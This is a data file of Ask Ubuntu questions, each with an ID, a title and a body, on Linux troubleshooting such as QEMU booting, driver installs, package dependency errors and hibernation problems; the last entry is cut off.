419958	why am i getting a black screen when booting vm using qemu ?	when i try to boot a virtual machine using : qemu-system-x86_64 -m 1024 -cdrom /host/iso/ubuntu-13.10-desktop-amd64.iso -name mac -hda ~/ubuntu iget a black screen just after the installation begins ( before i choose the language ) . i tried setting nomodeset in `` other options '' but this did not resolve the issue . however , using the same iso , i can boot the vm using virtual machine manager . i need to boot the vm using qemu-system-x86_64 for one of my projects . please let me know how to solve this .
419964	checking whether virtual machine is up or down from bare-metal	i want to check from my physical-host/bare-metal whether a virtual machine/guest is up or not . is there any command or utility for that ? to refine more , from the physical host/bare-metal my application need to know the status of the vm ( whether the vm is up or down ) . is there any option to check this ?
419965	using reliance 3g modem with ubuntu 12.04	i have a reliance 3g modem and i use it with windows 7 without any problem i want to use it with ubuntu to connect to the internet there is reliannetconnect.tar.gz file in the software disc inside a linux folder how do i install the software ?
419967	how to use my huawei 173 dongle in ubuntu ( modem manager dosnt work unpredictable )	is there any other software i could use to send/receive sms in ubuntu 12.04 for my dongle ? modem manager software is bad and unstable .
419969	any way to change the default folder icon ?	i 've tried 'assogiate ' but contains only about the file types , no folder option is available.i do n't want to install any theme or change folder icon individually . my bad , did n't include at first : i want to add icon of my choice . any help is appreciated !
419970	thoughtcrime sslstrip installation tar	matt @ matt-macbook : $ sudo tar zxvf sslstrip-0.9.tar.gz tar ( child ) : sslstrip-0.9.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now how can i install this software ?
419972	hp ml330 g6 not booting - sbin/init not found	1 of 4 drives failed - replacement installed and logical drive rebuilt successfully - no other hardware faults . ubuntu 9.10 server installed . on boot , 1 logical drive found , but following messages appear and system halts ... chroot : can not execute /etc/apparmor/initramfs : no such file or directory run-init : /sbin/init : no such file or directory [ 20.252079 ] kernel panic - not syncing : attempted to kill init !
419973	battery discharges in a strange way on lenovo ideapad z500	i 've a lenovo ideapad z500 laptop with windows only energy management software ( my battery stop charging at 60 % for long lasting life ) . setting the threshold from windows , it remains also with ubuntu 13.10 64 bit , and that 's ok . in my case , battery is discharged in a strange way : it takes 30 minutes for consuming it from 60 % to 40 % , and then it suddenly drops to 5 % in one second . this behaviour is the same with various tools : laptop mode tools , tlp , powertop . i 'm using bumblebee for dual gpu management ( intel + nvidia ) , gpu temperature is < 50째 in normal situation . what can i do for obtaining a longer battery duration ? i explored some options but no results.. - thanks and sorry for my poor english
419981	how do i save my previous ssh sessions	i currently have to ssh into many different systems . is there a way to for me to save the hostname / ip of the host so that i do not have to constantly type in the hostname / ip address every time i want to start a new ssh session ? basically i would like to replicate putty 's save sessions ability on ubuntu 12.04.4 . kind regards , tim
419984	install rt3572 driver for asus usb-n53 adapter	i recently bought the asus usb-n53 wireless adapter , and want to install the latest driver for it . it comes with instructions of how to install the driver from the files provided , but i ca n't use makefile , so ca n't install the driver correctly . these are the instructions from the readme file included : ======================================================================= build instructions : tar -jxvf 2011_1003_rt3572_linux_sta_v2.5.0.0.dpo.tar.bz2 go to ./2011_1003_rt3572_linux_sta_v2.5.0.0.dpo directory . switch to super user . ** for fedora $ su ** for ubuntu $ sudo su in makefile set the `` mode = sta '' in makefile and chose the target to linux by set `` target = linux '' define the linux kernel source include file path linux_src modify to meet your need . in os/linux/config.mk define the gcc and ld of the target machine define the compiler flags cflags modify to meet your need . ** build for being controlled by networkmanager or wpa_supplicant wext functions please set has_wpa_supplicant=y and has_native_wpa_supplicant_support=y . = > # > cd wpa_supplicant-x.x = > # > ./wpa_supplicant -dwext -ira0 -c wpa_supplicant.conf -d ** build for being controlled by wpasupplicant with ralink driver please set has_wpa_supplicant=y and has_native_wpa_supplicant_support=n . = > # > cd wpa_supplicant-0.5.7 = > # > ./wpa_supplicant -dralink -ira0 -c wpa_supplicant.conf -d compile driver source code $ make ======================================================================= install instructions : load driver $ make install plug in usb dongle . ======================================================================= can somebody help me to use makefile to install the driver ? edit : when i ran uname -r , the terminal outputted 3.2.0-58-generic-pae . when i ran lsusb , the terminal outputted : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0ac8:3450 z-star microelectronics corp . bus 001 device 004 : id 0b05:179d asustek computer , inc . bus 003 device 002 : id 058f:9360 alcor micro corp. 8-in-1 media card reader bus 002 device 002 : id 05fc:0231 harman multimedia
419986	installing ubuntu 13.10 , ps2 keyboard not recognized ( worked in 12.04 )	i have a old laptop with a internal ps2 keyboard ( right now it is running ubuntu 12.04 lts ) . i want to install the new version 13.10 but i found that the keyboard is not recognized . can anyone help me ? how can i put it working ? i need to change the kernel version ? well i think that was a bad choise withdraw some of the old support features .
419987	ca n't add video files in open shot	i am unable to add video files ( .avi and .wmv ) to an openshot project . i am also unable to play them in parole media player ( keeps asking for a text/html decoder like gstreamer ) or vlc . i get the error [ video ] .avi : invalid data found when processing input when using ffplay and ffmpeg on the video file . i am running xubuntu 13.10 and already have xubuntu-restricted-extras installed .
419990	laptop overheating also after installing latest kernel	i got hp g6 laptop with i3 processor , amd radeon 7450m dedicated gpu . i got ubuntu 13.10 installed . it is overheating too much . i tried changing to latest kernel 3.12.x and also edited grub file grub_cmdline_linux_default= '' quiet splash pcie_aspm=force '' still my laptop is overheating . any solution for this ?
419992	ca n't access websites but connected to wifi	since i 've upgraded from 12.10 to 13.10 i can not access any websites on any browser but i can use the ubuntu software center . i am a complete noob when it comes to ubuntu and any suggestions would be greatly appreciated ! ps : i am using a macbook 3.1
419994	why ca n't i install latex in ubuntu12.04 ?	when i run $ sudo apt-get install texlive-latex-base it showed the following error . reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libgraphite3 libkpathsea6 libptexenc1 libreadline5 libruby1.8 lmodern luatex ruby ruby1.8 tex-common texlive-base texlive-binaries texlive-common texlive-doc-base texlive-latex-base-doc texlive-luatex suggested packages : ri ruby-dev ruby1.8-examples ri1.8 perl-tk the following new packages will be installed : libgraphite3 libkpathsea6 libptexenc1 libreadline5 libruby1.8 lmodern luatex ruby ruby1.8 tex-common texlive-base texlive-binaries texlive-common texlive-doc-base texlive-latex-base texlive-latex-base-doc texlive-luatex 0 upgraded , 17 newly installed , 0 to remove and 0 not upgraded . need to get 35.0 mb/102 mb of archives . after this operation , 201 mb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //ppa.launchpad.net/texlive-backports/ppa/ubuntu/ precise/main lmodern all 2.004.1-5~precise1 connection failed err http : //ppa.launchpad.net/texlive-backports/ppa/ubuntu/ precise/main texlive-binaries i386 2012.20120628-1~ubuntu12.04.1 connection failed failed to fetch http : //ppa.launchpad.net/texlive-backports/ppa/ubuntu/pool/main/l/lmodern/lmodern_2.004.1-5~precise1_all.deb connection failed failed to fetch http : //ppa.launchpad.net/texlive-backports/ppa/ubuntu/pool/main/t/texlive-bin/texlive-binaries_2012.20120628-1~ubuntu12.04.1_i386.deb connection failed e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i also tried $ sudo apt-get install -- fix-missing texlive-latex-base which showed the error naveen @ naveen-inspiron-3521 : ~ $ sudo apt-get install -- fix-missing texlive-latex-base [ sudo ] password for naveen : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : lmodern luatex tex-common texlive-base texlive-binaries texlive-common texlive-doc-base texlive-latex-base-doc texlive-luatex suggested packages : perl-tk the following new packages will be installed : lmodern luatex tex-common texlive-base texlive-binaries texlive-common texlive-doc-base texlive-latex-base texlive-latex-base-doc texlive-luatex 0 upgraded , 10 newly installed , 0 to remove and 0 not upgraded . need to get 48.2 mb/87.6 mb of archives . after this operation , 169 mb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //archive.ubuntu.com/ubuntu/ precise/main texlive-binaries i386 2009-11ubuntu2 connection failed [ ip : 91.189.92.201 80 ] err http : //archive.ubuntu.com/ubuntu/ precise/main texlive-latex-base-doc all 2009-15 connection failed [ ip : 91.189.91.13 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/t/texlive-bin/texlive-binaries_2009-11ubuntu2_i386.deb connection failed [ ip : 91.189.92.201 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/t/texlive-base/texlive-latex-base-doc_2009-15_all.deb connection failed [ ip : 91.189.91.13 80 ] unable to correct missing packages . e : aborting install . how can i get rid of this problem ?
419996	how to open a file in sublime text 2 directly from a link in terminal ?	i use two dev boxes - one is macbookpro where i use iterm and one is ubunu where i use the built-in terminal . in iterm i have the following neat feature . say you have run some tests , which fail and you get a backtrace in exactly which file , on which line something went wrong . when i hold command and click on the file path , the file opens automatically in sublime text 2 and the cursor is even on the right line . can i do something similar in the terminal on ubuntu ?
419998	finding key symbol name for windows button	how can i find the key symbol name for windows button of my keyboard ? i know that i can use xev -event keyboard , but that 's not working for windows button . any ideas/pointer for this ? this is how i find key symbol for other keys : $ > xev -event keyboard ( then press some button ) keyrelease event , serial 28 , synthetic no , window 0x1800001 , root 0x8e , subw 0x0 , time 709808 , ( 27,293 ) , root : ( 28,384 ) , state 0x0 , keycode 60 ( keysym 0x2e , period ) , same_screen yes , xlookupstring gives 1 bytes : ( 2e ) `` . '' xfilterevent returns : false i find that period is the key symbol name for that key . this method does n't work for window button .
420002	how to enable static application switcher ?	in ccsm have i tried to enable `` static application switcher '' which from the icon looks like what i am looking for , but it gave a conflict with unity , and crashed the config files , so i had to delete them . question on a default installation of ubuntu 12.04 , is it possible to change alt+tab to display all windows on the screen instead of just the programs ?
420003	system crashes frequently out of nowhere ( lenovo w530 )	running ubuntu 13.10 - lenovo w530 linux version 3.11.0-15-generic ( buildd @ roseapple ) ( gcc version 4.8.1 ( ubuntu/linaro 4.8.1-10ubuntu8 ) ) # 25-ubuntu smp thu jan 30 17:22:01 utc 2014 ( ubuntu 3.11.0-15.25-generic 3.11.10 ) i could either be browsing or trying to ssh into another host that my system will freeze/reboot . it can happen twice a day and maybe 5 times/week . i run memcheck and smart tests with nothing showing up . how can i know if it was a kernel panic or something related to the graphic card ? how can i know if i 'm using the right graphic card driver ? some info that might be useful ( but i do n't know ) . from dmesg : warning : cpu : 6 pid : 1140 at /build/buildd/linux-3.11.0/drivers/gpu/drm/i915/intel_display.c:8329 check_crtc_state+0x5af/0x9f0 [ i915 ] ( ) from /var/log/syslog : kernel : [ 12.211846 ] [ drm : intel_pipe_config_compare ] *error* mismatch in adjusted_mode.flags ( expected 4 , found 0 ) kernel : [ 12.211850 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- kernel : [ 12.211870 ] warning : cpu : 6 pid : 1140 at /build/buildd/linux-3.11.0/drivers/gpu/drm/i915/intel_display.c:8329 check_crtc_state+0x5af kernel : [ 12.211871 ] pipe state does n't match ! kernel : [ 12.211872 ] modules linked in : hid_microsoft parport_pc ppdev snd_hda_codec_realtek rfcomm bnep joydev x86_pkg_temp_thermal intel_po kernel : [ 12.211900 ] cpu : 6 pid : 1140 comm : xorg not tainted 3.11.0-15-generic # 25-ubuntu kernel : [ 12.211901 ] hardware name : lenovo 243852u/243852u , bios g5et95ww ( 2.55 ) 09/13/2013 kernel : [ 12.211903 ] 0000000000000009 ffff8804266d5898 ffffffff816e7375 ffff8804266d58e0 kernel : [ 12.211905 ] ffff8804266d58d0 ffffffff81061dcd ffff8804272ed6d0 0000000000000001 kernel : [ 12.211906 ] ffff8804236a7800 ffff8804272ed000 ffff8804236a7c78 ffff8804266d5930 kernel : [ 12.211908 ] call trace : kernel : [ 12.211913 ] [ < ffffffff816e7375 > ] dump_stack+0x45/0x56 kernel : [ 12.211917 ] [ < ffffffff81061dcd > ] warn_slowpath_common+0x7d/0xa0 kernel : [ 12.211918 ] [ < ffffffff81061e3c > ] warn_slowpath_fmt+0x4c/0x50 kernel : [ 12.211926 ] [ < ffffffffa02e6b5f > ] check_crtc_state+0x5af/0x9f0 [ i915 ] kernel : [ 12.211934 ] [ < ffffffffa02f1d83 > ] intel_modeset_check_state+0x2c3/0x770 [ i915 ] kernel : [ 12.211940 ] [ < ffffffffa02f22a5 > ] intel_set_mode+0x25/0x30 [ i915 ] kernel : [ 12.211947 ] [ < ffffffffa02f2af2 > ] intel_crtc_set_config+0x742/0x920 [ i915 ] kernel : [ 12.211956 ] [ < ffffffffa0164fad > ] drm_mode_set_config_internal+0x5d/0xe0 [ drm ] kernel : [ 12.211962 ] [ < ffffffffa01679e7 > ] drm_mode_setcrtc+0xf7/0x650 [ drm ] kernel : [ 12.211967 ] [ < ffffffffa01581f2 > ] drm_ioctl+0x512/0x640 [ drm ] kernel : [ 12.211970 ] [ < ffffffff811b9045 > ] do_vfs_ioctl+0x2e5/0x4d0 kernel : [ 12.211973 ] [ < ffffffff811a9651 > ] ? __sb_end_write+0x31/0x60 kernel : [ 12.211974 ] [ < ffffffff811a71e2 > ] ? vfs_write+0x172/0x1e0 kernel : [ 12.211976 ] [ < ffffffff811b92b1 > ] sys_ioctl+0x81/0xa0 kernel : [ 12.211978 ] [ < ffffffff816f725d > ] system_call_fastpath+0x1a/0x1f kernel : [ 12.211979 ] -- - [ end trace eec93271d54623a2 ] -- - armenzg-thinkpad ~ $ sudo jockey-text -l [ sudo ] password for armenzg : kmod : nvidia_319_updates - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) kmod : nvidia_304 - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) kmod : nvidia_304_updates - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) kmod : nvidia_319 - nvidia binary xorg driver , kernel module and vdpau library ( proprietary , disabled , not in use ) armenzg-thinkpad ~ $ sudo lshw -c video | grep `` configuration '' configuration : driver=nouveau latency=0 configuration : driver=i915 latency=0 armenzg-thinkpad ~ $ sudo lshw -c video *-display description : vga compatible controller product : gk107glm [ quadro k1000m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : f0000000-f0ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport:5000 ( size=128 ) memory : f1000000-f107ffff *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : f1400000-f17fffff memory : e0000000-efffffff ioport:6000 ( size=64 )
420005	can not add ppa : 'ppa : yannubuntu/boot-repair '	i had ubuntu 13.10 installed on my laptop . after i upgraded windows , i tried to get grub back through boot repair via these commands mentioned here : sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update sudo apt-get install -y boot-repair & & boot-repair but when i run first command i get this error : can not add ppa : 'ppa : yannubuntu/boot-repair ' . please check that the ppa name or format is correct . what 's the problem ?
420006	zfs mountpoint for sidebar	i 'm trying to mount a zfs drive in lubuntu , i can get it to mount , but i ca n't find the proper mount point to get it to show in the side bar like a normal drive would . sudo zfs set mountpoint= ? / ? tank/data i assume it 's something simple , cause i 've been looking for hours and ca n't find it ! thanks
420007	prepare ubuntu for vm template	what should be the steps / actions one should do in order for preparing an ubuntu virtual machine to be suitable for a template . i can only think of : clean /etc/udev/rules.d/70-persistent-net.rules clean /etc/ssh/ssh_host_* ( but how and when regenerate this ) hostname - is there a way to invoke hostname configurator on first boot ? is there an app , or script like the oem installation for doing this to a server install ? regards
420012	loud fan on every ubuntu os	i am totally new to linux but i like it . my problem is , i have tried ubuntu , lubuntu , linux mint and all cause a loud fan . if i am on windows its nice and smooth , not to mention i have a brand new cooler , not to mention i have an ati mobility radeon hd3200 , and no matter how i tried to install it , nothing worked , and nothing worked on the fan problem . so if anybody can give any hint to me , i would be grateful
420014	freshbooks online account	i 'm developing an application that connects to freshbook 's api . i can either integrate the account authentication process within my application , or i can develop an online account that could be used by other application developers . i 've looked at some of the code in the existing online accounts ( with reference from how do i use oauth from an ubuntu touch app ? ) . however , freshbooks is a bit more complicated . the way they work , each account has a dedicated sub-domain , each with its own separate oauth url . i ca n't just put a fixed endpoint in the code . so my question is , how would i go about adding a field before the oauth process that collects the sub-domain from the user , before opening the oauth form page ? i 'm starting from zero knowledge of how online accounts are implemented , so i do n't know where to start . edit : as a workaround , i put the oauth process directly into my application , see this question : get qt webkit html content in qml
420015	32 bit crtbegin.o on 64-bit ubuntu 12.10	i 'm trying to compile a 32-bit binary on 64-bit ubuntu using clang 3.4 and the -m32 option . however , i 'm getting the following linker error : /usr/bin/ld : can not find crtbegin.o : no such file or directory /usr/bin/ld : can not find -lgcc /usr/bin/ld : can not find -lgcc_s clang : error : linker command failed with exit code 1 ( use -v to see invocation ) i have 64-bit versions of these libraries , but i ca n't seem to find the 32-bit versions . brad @ brad-laptop : /usr $ find . -name crtbegin.o ./lib/gcc/x86_64-linux-gnu/4.7/crtbegin.o ./lib/gcc/x86_64-linux-gnu/4.8/crtbegin.o brad @ brad-laptop : /usr $ readelf -h ./lib/gcc/x86_64-linux-gnu/4.8/crtbegin.o elf header : magic : 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 class : elf64 data : 2 's complement , little endian version : 1 ( current ) os/abi : unix - system v abi version : 0 type : rel ( relocatable file ) machine : advanced micro devices x86-64 version : 0x1 entry point address : 0x0 start of program headers : 0 ( bytes into file ) start of section headers : 456 ( bytes into file ) flags : 0x0 size of this header : 64 ( bytes ) size of program headers : 0 ( bytes ) number of program headers : 0 size of section headers : 64 ( bytes ) number of section headers : 16 section header string table index : 13 digging around in ubuntu packages i found that gcc-4.6 : i386 has a crtbegin.o , but i ca n't seem to install it . brad @ brad-laptop : ~/pebble/tintin $ sudo apt-get install gcc-4.6 : i386 [ sudo ] password for brad : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : gcc-4.6 : i386 : depends : binutils : i386 ( > = 2.23.52.20130612 ) but it is not going to be installed depends : libgomp1 : i386 ( > = 4.6.4-3ubuntu1 ) but it is not going to be installed depends : libquadmath0 : i386 ( > = 4.6.4-3ubuntu1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
420018	brightness is reset to maximum on every restart in ubuntu 13.10	i have upgraded from 13.04 to 13.10 . after every reboot the brightness is set to maximum . is there any solution ?
420020	unexpected command completion code	i am getting the error xhci_hcd 0000:07:00.0 error : unexpected command completion code 0x11 on ubuntu 13.10 . the error occurs when i resume my system from being suspended . it also happens on my tty screens ( alt + f1 - alt + f6 ) , but it will return when i return to my desktop in the case of the tty screens . in the case of system resume , i just have to restart my computer . this problem began after installing nvidia-current , although everything that i have seen suggests this problem has something to do with usb 3.0 . for my video card that is using that driver , it is an evga gtx 570 . any suggestions ?
420021	problem installing matlab 2012a in ubuntu 12.04 lts	the following problem is occurring while starting installation : sudo /media/mathworks_r2012a/install -glnx86 -v [ sudo ] password for kittu : sudo : /media/mathworks_r2012a/install : command not found
420023	how to install lazarus on ubuntu	above i installed with central programs , but yesterday i install a ubuntu in my mac and i dont see the lazarus on the central programs . anyone have a url with installation ubuntu , or the code for i use on the prompt ? how do this i need to download ? https : //apps.ubuntu.com/cat/search/ ? q=lazarus & op= thanks !
420024	how to remove status options from messages indicator ?	i 'm using ubuntu 13.10 with unity . i 'm willing to have an indicator for my gmail inbox . my current situation : i now use unity-mail , which works great with indicator-messages and is fully integrated in unity . but i have one thing that i do n't like , check this screenshot : as you can see , indicator-messages still shows me status `` available '' , `` away '' , `` invisible '' , and such . i would like to only have my emails , i do n't care about the other things this package can do . a way to achieve this : i saw here this screenshot : this is exaclty what i would like to have ! i also saw here that i could use the sources to recompile indicator-messages , by modifying some lines . unfortunately , the sources seems to have been rewritten , i ca n't follow the answer given , one file does n't exist anymore and the code in the second file is n't the same . so , here 's the question : how can i recompile indicator-messages to hide the status on 13.10 ?
420025	set network drive / share as home folder ?	i 've currently got ubuntu to mount my external hard drive on boot and use a folder on there as the home folder . i 've just bought a raspberry pi to act as a file server , and i 'll be connecting the external hard drive mentioned earlier to that as its hard drive . i 'll then share the contents of the external hard drive over the network ( on a static ip ) . obviously , without the presence of the hard drive when i boot ubuntu , it will come up with an error message at the boot screen . is it possible to set my ubuntu settings to mount the shared drive on boot , and then use the same folder within it as the home folder ? the raspberry pi will be on 24/7 , so there is no problem of there being periods of down time for the shared drive . the raspberry pi is currently running archlinux , but i can set it up with raspbian if that makes life easier . i have googled this and not managed to find a solution to this precise question ! many thanks in advance .
420026	why is the default swappiness 60 ? what would be the effect if i lower the swappiness value for my desktop pc ?	i was reading about swappiness in various forums and i saw some videos . many stated that it 's a good thing for desktop users to decrease the swappiness value below 60 ( which is the default ) . some stated that 60 is good for servers . exactly why would it be better for me to lower it and why is 60 good for servers ? i tried to search for an answer ( i looked here for example ) but could n't understand . ... please use easy terms : d
420027	can not locate software ( gnuplot ) in drive or synaptic but showing in terminal	i installed gnuplot 4.4.3 using the command 'sudo apt-get install gnuplot ' . it was working well . later i tried to upgrade it to 4.6 version by 'sudo upgrade gnuplot ' but it didnt work . i downloaded some files from internet and using one of them i saw that the version name was coming 4.6.4 . but the plot was not coming . i installed x11 terminal but it didnt work . i then uninstalled all gnuplot things using synaptic but still on command gnuplot in terminal , the version 4.6.4 is opening . reinstalling 4.4.2 is also not working . how can i remove that gnuplot 4.6.2 , not showing in any drive or software manager or synaptic ? is there any directory analogous to 'program files ' in windows ?
420028	remove amd drivers installed with automated installer	i have installed latest beta 14.1 amd drivers amd-driver-installer-13.35.1005-x86.x86_64.run with the automated installer and now i ca n't remove them . i tried : sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* but it does not work because fglrx is not installed . how can i remove those drivers ? thanks
420030	can not hibernate twice	i am running ubuntu 13.10 , and i manage to suspend to ram without any incidents . suspending to disk ( hibernate ) , however , does not work the second time i do it ( after a reboot ) . i tried to hibernate with pm-hibernate and also with uswusp . the first time after a re-boot it goes fine , but if i try to hibernate again , it will hung with the message s2disk snapshooting system and i 'll have to re-boot . my swap partition is bigger than my ram . my /etc/default/grub : grub_default= '' 5 '' grub_hidden_timeout_quiet= '' true '' grub_timeout= '' 10 '' grub_distributor= '' lsb_release -i -s 2 > /dev/null || echo debian '' grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' resume=uuid=6a6e6406-4022-4620-bb36-fbf29f5c1cdf '' grub_savedefault= '' false '' i run update-grub after changing the cmdline_linux parameter . my /etc/initramfs-tools/conf.d/resume : resume=uuid=6a6e6406-4022-4620-bb36-fbf29f5c1cdf updated it after changing it with : sudo update-initramfs -u i tried 're-setting ' my swap with : sudo swapoff -a & & sudo swapon -u 6a6e6406-4022-4620-bb36-fbf29f5c1cdf but it did n't change anything . output of free -m : total used free shared buffers cached mem : 1865 644 1220 0 111 328 -/+ buffers/cache : 205 1659 swap : 2044 0 2044 output of name -a : linux quoraf 3.11.0-13-generic # 20-ubuntu smp wed oct 23 07:38:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux is there any way to maybe re-set what 's wrong after the first hibernation ? i imagine that the system creates something somewhere , and this something blocks subsequent hibernations .
420032	access windows folder on ubuntu partition ( ext4 ) from window 7	i installed ubuntu 12.04 side by side with windows 7 . i installed ubuntu in a drive which also contained windows folder ( back up ) . but for some reason even though ubuntu installed properly i did not get the option to choose either win7 or ubuntu.window 7 was my only os.now when i am on window7 i cant see my second partition maybe because of the fornmwat : ext4.how do i access that folder ? thank you .
420034	flareget installation problem	whenever i run , sudo apt-get update , i find one is : err http : //ppa.launchpad.net saucy/main i386 packages 404 not found in i386 packages of ppa and 2nd : w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/flareget-i386/ubuntu/dists/saucy/main/binary-i386/packages 404 not found i think there is problem in installation of flareget software is there any command to fix this
420039	skype notification icon in gnome desktop not updating	running skype 4.2.0.13 gnome-desktop on ubuntu 12.04.4 lts , 3.8.0-35-generic . my skype status icon in the notification area is there , but is whited-out and never changes , regardless of my online status or number of unread messages . anyone know of a fix for this ?
420042	cant hear anysound on ubuntu 13.10 , and cant choose soundblaster recond3d as my soundcard	hey i just recently installed ubuntu 13.10 , and one of the first things that i noticed is that i could only hear the sound either directly from my laptop , or out of my hd monitor . this caught my attention because i have a speaker system plugged into one of the audio jacks in my alienware m14xr2 laptops , and i couldnt get sound to come out of it . so i started messing around online seeing what could fix this , and it appears i 've just broken it even more ! now i cant hear sound anywhere lol . halp ; 3 let me know what debug logs are needed .
420048	in gedit , what is the `` file browser panel '' plugin and what does it do ?	the `` file browser panel '' plugin says `` easy file access from the side panel '' . what side panel ? the launcher maybe ? i was watching 4 tricks to speed up ubuntu - youtube and it said to turn off this plugin . i just want to understand what i 'm dealing with .
420053	cgminer no devices found	when i run cgminer -n ( version 3.12.2 ) i get : [ 2014-02-12 11:09:10 ] usb all : found 12 devices - listing known devices [ 2014-02-12 11:09:10 ] no known usb devices when i run lcpci -v i do see my card : 03:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] antilles [ radeon hd 6990 ] ( prog-if 00 [ vga controller ] ) subsystem : advanced micro devices , inc. [ amd/ati ] device 0b2a flags : bus master , fast devsel , latency 0 , irq 51 memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at fbac0000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at ce00 [ size=256 ] [ virtual ] expansion rom at fba00000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : fglrx_pci 03:00.1 audio device : advanced micro devices , inc. [ amd/ati ] cayman/antilles hdmi audio [ radeon hd 6900 series ] subsystem : advanced micro devices , inc. [ amd/ati ] cayman/antilles hdmi audio [ radeon hd 6900 series ] flags : bus master , fast devsel , latency 0 , irq 49 memory at fbafc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 04:00.0 display controller : advanced micro devices , inc. [ amd/ati ] antilles [ radeon hd 6990 ] subsystem : advanced micro devices , inc. [ amd/ati ] device 1b2a flags : bus master , fast devsel , latency 0 , irq 52 memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at fb9c0000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at be00 [ size=256 ] [ virtual ] expansion rom at fb900000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : fglrx_pci 04:00.1 audio device : advanced micro devices , inc. [ amd/ati ] cayman/antilles hdmi audio [ radeon hd 6900 series ] subsystem : advanced micro devices , inc. [ amd/ati ] cayman/antilles hdmi audio [ radeon hd 6900 series ] flags : bus master , fast devsel , latency 0 , irq 50 memory at fb9fc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel fglrxinfo results are : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6900 series opengl version string : 4.2.12337 compatibility profile context 13.101 display : :0 screen : 1 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6900 series opengl version string : 4.2.12337 compatibility profile context 13.101 when trying to compile with ./autogen.sh ( with or without -- enable-opengl ) i get opencl ... ... ... ... ... : not found . gpu mining support disabled configure : error : no mining configured in
420054	trouble installing mysql workbench	i am new to ubuntu linux . my professor asked us to download ubuntu 10.10 . i have made several attempts to download mysql as 32 and 64 bit in debian packages and it keeps failing . see below for what i wrote in the terminal . as you can see i get an error . i also get an error in the ubuntu software center stating `` dependency is not satisfiable : libatkmm-1.6-1 ( > = 2.22.1 ) `` . could you please give me some guidance so i know what i am doing wrong . thank you in advance . root @ ubuntu : ~ # dpkg -i '/home/user/mysql-workbench-gpl-5.2.47-1ubu1204-i386.deb'selecting previously deselected package mysql-workbench-gpl . ( reading database ... 118286 files and directories currently installed . ) unpacking mysql-workbench-gpl ( from ... /mysql-workbench-gpl-5.2.47-1ubu1204-i386.deb ) ... dpkg : dependency problems prevent configuration of mysql-workbench-gpl : mysql-workbench-gpl depends on libatkmm-1.6-1 ( > = 2.22.1 ) ; however : package libatkmm-1.6-1 is not installed . mysql-workbench-gpl depends on libc6 ( > = 2.15 ) ; however : version of libc6 on system is 2.12.1-0ubuntu6 . mysql-workbench-gpl depends on libctemplate0 ; however : package libctemplate0 is not installed . mysql-workbench-gpl depends on libglib2.0-0 ( > = 2.31.8 ) ; however : version of libglib2.0-0 on system is 2.26.0-0ubuntu1 . mysql-workbench-gpl depends on libglibmm-2.4-1c2a ( > = 2.32.0 ) ; however : version of libglibmm-2.4-1c2a on system is 2.25.5-0ubuntu1 . mysql-workbench-gpl depends on libgtk2.0-0 ( > = 2.24.0 ) ; however : version of libgtk2.0-0 on system is 2.22.0-0ubuntu1 . mysql-workbench-gpl depends on libgtkmm-2.4-1c2a ( > = 1:2.24.0 ) ; however : version of libgtkmm-2.4-1c2a on system is 1:2.20.3-1. mysql-workbench-gpl depends on libmysqlclient18 ( > = 5.5.13-1 ) ; however : package libmysqlclient18 is not installed . mysql-workbench-gpl depends on libpangomm-1.4-1 ( > = 2.27.1 ) ; however : version of libpangomm-1.4-1 on system is 2.26.2-1. mysql-workbench-gpl depends on libpcre3 ( > = 8.10 ) ; however : version of libpcre3 on system is 8.02-1. mysql-workbench-gpl depends on libpython2.7 ( > = 2.7 ) ; however : package libpython2.7 is not installed . mysql-workbench-gpl depends on libstdc++6 ( > = 4.6 ) ; however : version of libstdc++6 on system is 4.5.1-7ubuntu2 . mysql-workbench-gpl depends on libzip2 ( > = 0.10 ) ; however : package libzip2 